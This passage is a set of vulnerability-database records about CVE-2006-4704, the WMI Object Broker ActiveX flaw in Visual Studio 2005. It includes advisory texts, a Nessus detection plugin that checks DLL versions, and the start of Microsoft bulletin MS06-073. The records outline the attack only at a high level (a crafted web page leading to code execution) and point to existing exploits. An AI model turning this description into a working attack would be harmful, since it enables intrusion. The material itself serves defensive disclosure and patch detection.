Nov 2006\n * Date Last Updated: 05 Jan 2009\n * Severity Metric: 37.46\n * Document Revision: 31\n\n", "edition": 2, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "3c37fd70fda4377802bdf6960454fe3cb139b6c6cb99a3519c53641e733cb672", "hashmap": [{"hash": "0b7c22e7dbc334618a09b5b7d08cebd9", "key": "published"}, {"hash": "53205ce05ee12dcb18c267608e38026a", "key": "modified"}, {"hash": "b6ba9fa6ea18201bf39ea635ecca9f13", "key": "type"}, {"hash": "32fdbd98427634f186486a5af393ec33", "key": "references"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "4f03edb9c7c46f5f763bc03123f78d4a", "key": "href"}, {"hash": "33108fc36076afd2f7b12e673471da47", "key": "title"}, {"hash": "666155cdedc55f305e5050479b5730d8", "key": "description"}, {"hash": "b88fed7493afbd0ecd297013b4b81ed2", "key": "cvelist"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "5d2cfab83ed6e86a4812690790dc7ad5", "key": "reporter"}], "history": [], "href": "https://www.kb.cert.org/vuls/id/854856", "id": "VU:854856", "lastseen": "2018-08-02T21:55:31", "modified": "2009-01-05T00:00:00", "objectVersion": "1.3", "published": "2006-11-01T00:00:00", "references": ["http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx", "http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx", "http://support.microsoft.com/kb/929233/", "http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnaxctrl/html/msdn_signmark.asp", "http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx", "http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx", "http://msdn.microsoft.com/workshop/components/com/reference/ifaces/iobjectsafety/iobjectsafety.asp", "http://www.microsoft.com/technet/security/advisory/927709.mspx", "http://www.securityfocus.com/bid/20797", "http://support.microsoft.com/kb/925674", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4704", "http://secunia.com/advisories/22603/", "http://www.microsoft.com/com/default.mspx", "http://msdn.microsoft.com/workshop/components/activex/security.asp", "http://support.microsoft.com/kb/216434/", "http://www.cert.org/tech_tips/malicious_code_FAQ.html#ie56", "http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer", "http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer", "http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer", "http://support.microsoft.com/kb/240797", "http://support.microsoft.com/kb/240797", "http://support.microsoft.com/kb/240797", "http://www.zerodayinitiative.com/advisories/ZDI-06-047.html", "http://www.microsoft.com/technet/security/advisory/927709.mspx ", "http://msdn.microsoft.com/workshop/components/activex/safety.asp", "http://msdn.microsoft.com/workshop/components/activex/safety.asp", "http://msdn.microsoft.com/workshop/components/activex/safety.asp"], "reporter": "CERT", "title": "WMI Object Broker ActiveX Control bypasses ActiveX security model", "type": "cert", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-02T21:55:31"}], "edition": 4, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "b88fed7493afbd0ecd297013b4b81ed2"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "666155cdedc55f305e5050479b5730d8"}, {"key": "href", "hash": "4f03edb9c7c46f5f763bc03123f78d4a"}, {"key": "modified", "hash": "53205ce05ee12dcb18c267608e38026a"}, {"key": "published", "hash": "0b7c22e7dbc334618a09b5b7d08cebd9"}, {"key": "references", "hash": "32fdbd98427634f186486a5af393ec33"}, {"key": "reporter", "hash": "5d2cfab83ed6e86a4812690790dc7ad5"}, {"key": "title", "hash": "33108fc36076afd2f7b12e673471da47"}, {"key": "type", "hash": "b6ba9fa6ea18201bf39ea635ecca9f13"}], "hash": "3c37fd70fda4377802bdf6960454fe3cb139b6c6cb99a3519c53641e733cb672", "viewCount": 0, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "vulnersScore": 6.8}, "objectVersion": "1.3"}

{"cve": [{"lastseen": "2017-10-11T11:06:47", "references": ["http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx", "http://securitytracker.com/id?1017142", "http://www.kb.cert.org/vuls/id/854856", "http://www.microsoft.com/technet/security/advisory/927709.mspx", "http://www.securityfocus.com/bid/20797", "https://exchange.xforce.ibmcloud.com/vulnerabilities/29915", "http://research.eeye.com/html/alerts/zeroday/20061031.html", "http://www.vupen.com/english/advisories/2006/4282", "http://www.securityfocus.com/data/vulnerabilities/exploits/0day_ie.pdf", "http://www.us-cert.gov/cas/techalerts/TA06-346A.html", "http://www.securityfocus.com/bid/20843", "http://www.securityfocus.com/archive/1/archive/1/454969/100/200/threaded", "http://blogs.technet.com/msrc/archive/2006/11/01/microsoft-security-advisory-927709-posted.aspx", "http://www.zerodayinitiative.com/advisories/ZDI-06-047.html", "http://www.securityfocus.com/archive/1/archive/1/454201/100/0/threaded"], "description": "Cross-zone scripting vulnerability in the WMI Object Broker (WMIScriptUtils.WMIObjectBroker2) ActiveX control (WmiScriptUtils.dll) in Microsoft Visual Studio 2005 allows remote attackers to bypass Internet zone restrictions and execute arbitrary code by instantiating dangerous objects, aka \"WMI Object Broker Vulnerability.\"", "edition": 3, "reporter": "NVD", "published": "2006-11-01T10:07:00", "title": "CVE-2006-4704", "type": "cve", "enchantments": {"score": {"modified": "2017-10-11T11:06:47", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:288", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A288"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-4704"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:288", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:288"}], "modified": "2017-10-10T21:31:16", "cpe": ["cpe:/a:microsoft:visual_studio_.net:2005"], "id": "CVE-2006-4704", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4704", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2016-12-14T16:58:06", "references": [], "edition": 1, "description": "Added: 01/15/2007 \nCVE: [CVE-2006-4704](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4704>) \nBID: [20843](<http://www.securityfocus.com/bid/20843>) \nOSVDB: [30155](<http://www.osvdb.org/30155>) \n\n\n### Background\n\nMicrosoft [Visual Studio](<http://msdn.microsoft.com/vstudio/>) is a product to assist with software development in the Windows operating system. \n\n### Problem\n\nA flaw in the WMI Object Broker ActiveX control allows attackers to bypass security zone restrictions, leading to command execution when a user opens a specially crafted web page. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 06-073](<http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx> \n<http://www.zerodayinitiative.com/advisories/ZDI-06-047.html> \n\n\n### Limitations\n\nExploit works on Microsoft Visual Studio 2005 and requires a user to open the exploit in a web browser. \n\n### Platforms\n\nWindows \n \n\n", "reporter": "SAINT Corporation", "published": "2007-01-15T00:00:00", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "Microsoft Visual Studio 2005 WMI Object Broker vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4704"], "modified": "2007-01-15T00:00:00", "id": "SAINT:CE0E723D92F36418C7A3B000BE4BF5AC", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/visual_studio_wmi_object_broker", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-03T15:01:58", "references": [], "description": "Added: 01/15/2007 \nCVE: [CVE-2006-4704](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4704>) \nBID: [20843](<http://www.securityfocus.com/bid/20843>) \nOSVDB: [30155](<http://www.osvdb.org/30155>) \n\n\n### Background\n\nMicrosoft [Visual Studio](<http://msdn.microsoft.com/vstudio/>) is a product to assist with software development in the Windows operating system. \n\n### Problem\n\nA flaw in the WMI Object Broker ActiveX control allows attackers to bypass security zone restrictions, leading to command execution when a user opens a specially crafted web page. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 06-073](<http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx> \n<http://www.zerodayinitiative.com/advisories/ZDI-06-047.html> \n\n\n### Limitations\n\nExploit works on Microsoft Visual Studio 2005 and requires a user to open the exploit in a web browser. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2007-01-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "saint", "title": "Microsoft Visual Studio 2005 WMI Object Broker vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4704"], "modified": "2007-01-15T00:00:00", "id": "SAINT:C574B3949AC481238CB823F3F64EF15B", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/visual_studio_wmi_object_broker", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:12", "references": [], "description": "Added: 01/15/2007 \nCVE: [CVE-2006-4704](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4704>) \nBID: [20843](<http://www.securityfocus.com/bid/20843>) \nOSVDB: [30155](<http://www.osvdb.org/30155>) \n\n\n### Background\n\nMicrosoft [Visual Studio](<http://msdn.microsoft.com/vstudio/>) is a product to assist with software development in the Windows operating system. \n\n### Problem\n\nA flaw in the WMI Object Broker ActiveX control allows attackers to bypass security zone restrictions, leading to command execution when a user opens a specially crafted web page. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 06-073](<http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx> \n<http://www.zerodayinitiative.com/advisories/ZDI-06-047.html> \n\n\n### Limitations\n\nExploit works on Microsoft Visual Studio 2005 and requires a user to open the exploit in a web browser. \n\n### Platforms\n\nWindows \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2007-01-15T00:00:00", "title": "Microsoft Visual Studio 2005 WMI Object Broker vulnerability", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4704"], "modified": "2007-01-15T00:00:00", "id": "SAINT:77930DA0D02A6BFB9652933CECDF4DBB", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/visual_studio_wmi_object_broker", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-02T00:00:07", "references": ["https://technet.microsoft.com/library/security/ms06-073"], "pluginID": "23836", "description": "The remote host is running a version of Microsoft Visual Studio 2005 that is vulnerable to a buffer overflow when handling malformed WMI request in the ActiveX component.\n\nAn attacker may exploit this flaw to execute arbitrary code on this host, by entice a use to visit a specially crafter web page.", "edition": 7, "reporter": "Tenable", "published": "2006-12-12T00:00:00", "title": "MS06-073: Vulnerability in Visual Studio 2005 Could Allow Remote Code Execution (925674)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Windows : Microsoft Bulletins", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4704"], "modified": "2018-07-27T00:00:00", "cpe": ["cpe:/a:microsoft:visual_studio"], "id": "SMB_NT_MS06-073.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=23836", "sourceData": "#\n# Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23836);\n script_version(\"1.34\");\n script_cvs_date(\"Date: 2018/07/27 18:38:16\");\n\n script_cve_id(\"CVE-2006-4704\");\n script_bugtraq_id(20843);\n script_xref(name:\"CERT\", value:\"854856\");\n script_xref(name:\"MSFT\", value:\"MS06-073\");\n script_xref(name:\"MSKB\", value:\"925674\");\n\n script_name(english:\"MS06-073: Vulnerability in Visual Studio 2005 Could Allow Remote Code Execution (925674)\");\n script_summary(english:\"Determines the version of visual studio\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through the web\nbrowser.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Microsoft Visual Studio 2005\nthat is vulnerable to a buffer overflow when handling malformed WMI\nrequest in the ActiveX component.\n\nAn attacker may exploit this flaw to execute arbitrary code on this\nhost, by entice a use to visit a specially crafter web page.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/ms06-073\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for VS2005.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/11/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:visual_studio\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS06-073';\nkb = '925674';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\n\ncommon = hotfix_get_commonfilesdir();\nif ( ! common ) exit(1, \"Failed to get the Common Files directory.\");\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0, \"KB 'SMB/Registry/Enumerated' not set to TRUE.\");\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, \"smb_session_init\");\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:\"IPC$\");\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL,\"IPC$\");\n}\n\n\n# Connect to remote registry.\nhklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);\nif (isnull(hklm))\n{\n NetUseDel();\n audit(AUDIT_REG_FAIL);\n}\n\n\n# Determine where it's installed.\nkey = \"SOFTWARE\\Microsoft\\VisualStudio\\8.0\";\nkey_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\n\n\nif (isnull(key_h))\n{\n RegCloseKey(handle:hklm);\n NetUseDel();\n exit(0);\n}\nelse\n{\n RegCloseKey(handle:key_h);\n RegCloseKey(handle:hklm);\n NetUseDel (close:FALSE);\n}\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:common);\nwmi = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\Microsoft Shared\\WMI\\wmiscriptutils.dll\", string:common);\n\n\nr = NetUseAdd(share:share);\nif ( r != 1 )\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL,share);\n}\n\nhandle = CreateFile (file:wmi, desired_access:GENERIC_READ, file_attributes:FILE_ATTRIBUTE_NORMAL, share_mode:FILE_SHARE_READ, create_disposition:OPEN_EXISTING);\n\nif ( ! isnull(handle) )\n{\n v = GetFileVersion(handle:handle);\n CloseFile(handle:handle);\n if ( ! isnull(v) )\n {\n if ( v[0] == 8 && v[1] == 0 && ( (v[2] < 50727 ) || ( v[2] == 50727 && v[3] < 236 ) ) )\n {\n hotfix_add_report('\\nPath : '+share-'$'+':'+wmi+\n '\\nVersion : '+join(v, sep:'.')+\n '\\nShould be : 8.0.50727.236\\n',\n bulletin:bulletin, kb:kb);\n set_kb_item(name:\"SMB/Missing/MS06-073\", value:TRUE);\n hotfix_security_warning();\n }\n }\n}\n\n\nNetUseDel();\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:26", "references": [], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://blogs.technet.com/msrc/archive/2006/11/01/microsoft-security-advisory-927709-posted.aspx\nSecurity Tracker: 1017142\n[Secunia Advisory ID:22603](https://secuniaresearch.flexerasoftware.com/advisories/22603/)\nOther Advisory URL: http://isc.sans.org/diary.php?storyid=1815\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-047.html\nNews Article: http://www.eweek.com/article2/0,1759,2048968,00.asp?kc=EWRSS03119TX1K0000594\nMicrosoft Security Bulletin: MS06-073\nMicrosoft Knowledge Base Article: 927709\nMicrosoft Knowledge Base Article: 925674\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-12/0234.html\nGeneric Exploit URL: http://metasploit.com/projects/Framework/exploits.html#ie_createobject\nFrSIRT Advisory: ADV-2006-4282\n[CVE-2006-4704](https://vulners.com/cve/CVE-2006-4704)\nCERT VU: 854856\nBugtraq ID: 20843\n", "edition": 1, "reporter": "OSVDB", "published": "2006-11-01T03:33:35", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Microsoft Visual Studio WMI Object Broker ActiveX Control (WmiScriptUtils.dll) Unspecified Code Execution", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4704"], "modified": "2006-11-01T03:33:35", "href": "https://vulners.com/osvdb/OSVDB:30155", "id": "OSVDB:30155", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdi": [{"lastseen": "2016-11-09T00:18:02", "references": ["http://www.microsoft.com/technet/security/Bulletin/MS06-073.mspx"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. Successful exploitation requires that the target user browse to a malicious web page.\n\nThe specific flaw exists in the Microsoft WMIScriptUtils.WMIObjectBroker2 ActiveX control which is bundled with Visual Studio 2005. An attacker can utilize this control to bypass Internet zone security restrictions and instantiate other dangerous objects that can be leveraged to result in arbitrary code execution.", "reporter": "Anonymous", "published": "2006-12-12T00:00:00", "title": "Microsoft Visual Studio WmiScriptUtils.dll Cross-Zone Scripting Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2006-4704"], "modified": "2006-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-06-047", "id": "ZDI-06-047", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:20", "references": [], "description": "ZDI-06-047: Microsoft Visual Studio WmiScriptUtils.dll Cross-Zone\r\n Scripting Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-047.html\r\nDecember 12, 2006\r\n\r\n-- CVE ID:\r\nCVE-2006-4704\r\n\r\n-- Affected Vendor:\r\nMicrosoft\r\n\r\n-- Affected Products:\r\nVisual Studio 2005 Standard Edition\r\nVisual Studio 2005 Professional Edition\r\nVisual Studio 2005 Team Suite\r\nVisual Studio 2005 Team Edition for Developers\r\nVisual Studio 2005 Team Edition for Architects\r\nVisual Studio 2005 Team Edition for Testers\r\n\r\n-- TippingPoint&#40;TM&#41; IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability since November 6, 2006 by Digital Vaccine protection\r\nfilter ID 4838. For further product information on the TippingPoint IPS:\r\n\r\n http://www.tippingpoint.com \r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Microsoft Internet Explorer. Successful\r\nexploitation requires that the target user browse to a malicious web\r\npage.\r\n\r\nThe specific flaw exists in the Microsoft\r\nWMIScriptUtils.WMIObjectBroker2 ActiveX control which is bundled with\r\nVisual Studio 2005. An attacker can utilize this control to bypass\r\nInternet zone security restrictions and instantiate other dangerous\r\nobjects that can be leveraged to result in arbitrary code execution.\r\n\r\n-- Vendor Response:\r\nMicrosoft has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\n http://www.microsoft.com/technet/security/Bulletin/MS06-073.mspx\r\n\r\n-- Disclosure Timeline:\r\n2006.06.15 - Vulnerability reported to vendor\r\n2006.11.06 - Digital Vaccine released to TippingPoint customers\r\n2006.12.12 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by an anonymous researcher.\r\n\r\n-- About the Zero Day Initiative &#40;ZDI&#41;:\r\nEstablished by TippingPoint, a division of 3Com, The Zero Day Initiative\r\n&#40;ZDI&#41; represents a best-of-breed model for rewarding security\r\nresearchers for responsibly disclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is used.\r\n3Com does not re-sell the vulnerability details or any exploit code.\r\nInstead, upon notifying the affected product vendor, 3Com provides its\r\ncustomers with zero day protection through its intrusion prevention\r\ntechnology. Explicit details regarding the specifics of the\r\nvulnerability are not exposed to any parties until an official vendor\r\npatch is publicly available. Furthermore, with the altruistic aim of\r\nhelping to secure a broader user base, 3Com provides this vulnerability\r\ninformation confidentially to security vendors &#40;including competitors&#41;\r\nwho have a vulnerability protection or mitigation product.", "edition": 1, "reporter": "Securityvulns", "published": "2006-12-13T00:00:00", "title": "ZDI-06-047: Microsoft Visual Studio WmiScriptUtils.dll Cross-Zone Scripting Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:20", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4704"], "modified": "2006-12-13T00:00:00", "id": "SECURITYVULNS:DOC:15380", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15380", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:20", "references": [], "description": "Microsoft Security Bulletin MS06-073\r\nVulnerability in Visual Studio 2005 Could Allow Remote Code Execution &#40;925674&#41;\r\nPublished: December 12, 2006\r\n\r\nVersion: 1.0\r\nSummary\r\n\r\nWho Should Read this Document: Customers who use Microsoft Visual Studio 2005\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately\r\n\r\nSecurity Update Replacement: None\r\n\r\nCaveats: Microsoft Knowledge Base Article 925674 documents the currently known issues that customers may experience when they install this security update. The article also documents recommended solutions for these issues. For more information, see Microsoft Knowledge Base Article 925674.\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Visual Studio 2005 \u2014 Download the update\r\n\u2022\t\r\n\r\nVisual Studio 2005 Standard Edition\r\n\u2022\t\r\n\r\nVisual Studio 2005 Professional Edition\r\n\u2022\t\r\n\r\nVisual Studio 2005 Team Suite\r\n\u2022\t\r\n\r\nVisual Studio 2005 Team Edition for Developers\r\n\u2022\t\r\n\r\nVisual Studio 2005 Team Edition for Architects\r\n\u2022\t\r\n\r\nVisual Studio 2005 Team Edition for Testers\r\n\r\nNon-Affected Software:\r\n\u2022\t\r\n\r\nMicrosoft Visual Studio 2005\r\n\u2022\t\r\n\r\nVisual Basic 2005 Express Edition\r\n\u2022\t\r\n\r\nVisual C++ 2005 Express Edition\r\n\u2022\t\r\n\r\nVisual C# Express Edition\r\n\u2022\t\r\n\r\nVisual J# Express Edition\r\n\u2022\t\r\n\r\nVisual Web Developer Express Edition\r\n\u2022\t\r\n\r\nVisual Studio 2005 Tools For Office\r\n\u2022\t\r\n\r\nVisual Studio 2005 Team Explorer\r\n\u2022\t\r\n\r\nVisual Studio 2005 Team Foundation Dual-Server\r\n\u2022\t\r\n\r\nVisual Studio 2005 Team Foundation Single Server\r\n\u2022\t\r\n\r\nVisual Studio 2005 Team Foundation Proxy\r\n\u2022\t\r\n\r\nVisual Studio 2005 Team Foundation Build\r\n\u2022\t\r\n\r\nVisual Studio 2005 Premier Partner Edition\r\n\u2022\t\r\n\r\nMicrosoft Visual Studio 6.0 Service Pack 6\r\n\u2022\t\r\n\r\nMicrosoft Visual Studio .NET 2002 Service Pack 1\r\n\u2022\t\r\n\r\nMicrosoft Visual Studio .NET 2003 Service Pack 1\r\n\r\nNote Not all versions of Visual Studio 2005 include the affected file. If you do not have wmiscriptutils.dll on your system you are not affected by this vulnerability.\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\nTop of sectionTop of section\r\nGeneral Information\r\n\t\r\nExecutive Summary\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a public vulnerability. The vulnerability is documented in the &quot;Vulnerability Details&quot; section of this bulletin.\r\n\r\nAn attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nIf a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWe recommend that customers apply the update immediately.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tVisual Studio 2005\r\n\r\nWMI Object Broker Vulnerability - CVE-2006-4704\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nNote By default, Internet Explorer on Windows Server 2003 runs in a restricted mode that is known as Enhanced Security Configuration. This mode mitigates this vulnerability. See the FAQ section for this security update for more information about Internet Explorer Enhanced Security Configuration.\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions &#40;FAQ&#41; Related to This Security Update\r\n\r\nWhat updates does this release replace?\r\nThis security update does not replace any prior security update.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer &#40;MBSA&#41; to determine whether this update is required?\r\n\r\nThe following table provides the MBSA detection summary for this security update.\r\nProduct\tMBSA 1.2.1\tEST\tMBSA 2.0\r\n\r\nVisual Studio 2005\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nFor more information about MBSA, visit the MBSA Web site.\r\n\r\nFor more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nWhat is the Enterprise Update Scan Tool &#40;EST&#41;?\r\nAs part of an ongoing commitment to provide detection tools for bulletin-class security updates, Microsoft delivers a stand-alone detection tool whenever the Microsoft Baseline Security Analyzer &#40;MBSA&#41; and the Office Detection Tool &#40;ODT&#41; cannot detect whether the update is required for an MSRC release cycle. This stand-alone tool is called the Enterprise Update Scan Tool &#40;EST&#41; and is designed for enterprise administrators. When a version of the Enterprise Update Scan Tool is created for a specific bulletin, customers can run the tool from a command-line interface &#40;CLI&#41; and view the results of the XML output file. To help customers better utilize the tool, detailed documentation will be provided with the tool. There is also a version of the tool that offers an integrated experience for SMS administrators.\r\n\r\nCan I use a version of the Enterprise Update Scan Tool &#40;EST&#41; to determine whether this update is required?\r\nYes. Microsoft has created a version of EST that will determine if you have to apply this update. For download links and more information about the version of EST that is being released this month, see Microsoft Knowledge Base Article 894193. SMS customers should review the following FAQ, \u201cCan I use 